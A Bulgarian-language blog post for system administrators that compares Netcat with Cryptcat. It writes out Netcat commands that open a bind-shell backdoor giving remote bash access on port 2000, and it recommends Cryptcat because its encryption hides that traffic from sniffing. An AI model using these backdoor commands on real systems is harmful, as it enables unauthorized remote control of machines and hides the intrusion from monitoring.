Netcat vs Cryptcat, кой от двата инструмента да използваме?
Колкото и да е полезен Netcat, има една основна уязвимост, която може да ви издаде в критичен момент. Научете повече защо.
Последен ъпдейт на 28 юни 2018 в 11:29 ч.
Като системни администратори или специалисти по информационна сигурност, на всеки от нас най-вероятно му се е налагало да използва инструмента за дебъгинг Netcat. Нека все пак си припомним какви са функциите му и как може да бъде използван:
Netcat е един много добре разработен инструмент, които може да изпраща или получава информация посредством TCP или UDP протоколи. Има възможност да работи както като сървър, така и като клиент, за да трансферира файлове, да отваря backdoor shell в системата, да служи за сканиране или пренасочване на портове и дори като чат сървър/клиент.
Нека дадем и нагледен пример с това, как можем да отворим отдалечен backdoor към машина. За целта ще изпълним следната команда върху машината, която искаме да достъпим.
nc -l -p 2000 -e /bin/bash
С тази команда приложението се стартира в „сървърен“ режим, като отваря порт 2000 за достъп и изпълнява командния шел BASH.
Следващата стъпка е да изпълним следната команда върху друга машина:
nc <remote ip address> 2000
Така на практика ние си отворихме backdoor на порт 2000, през който можем да изпълняваме BASH Shell команди върху отдалечената машина.
Дотук всички сме съгласни, че инструментът може да бъде много полезен и широко използван в ежедневните ни задачи.
Като специалисти по информационна сигурност, може би някой от вас вече са се запитали „Какво става с трафика, които генерираме? Има ли начин да бъде проследен?“
Отговорът е ДА.
Трафикът който генерира NetCat е некриптиран и с инструмент като wireshark, лесно може да бъде „прослушан“. Оставяме на вас да направите експеримент и след като стартирате гореописаната команда, да изследвате комуникацията с любимия си инструмент за мрежово проследяване на трафик.
Какво е решението, ако искаме комуникацията ни с NetCat да е криптирана?
Тук на помощ идва CryptCat.
CryptCat е същия инструмент, но с добавена възможност за криптиране на комуникацията с Two-Fish алгоритъм.
Опитайте сега същата опитна постановка, но използвайки CryptCat. Резултатът е различен нали? ;)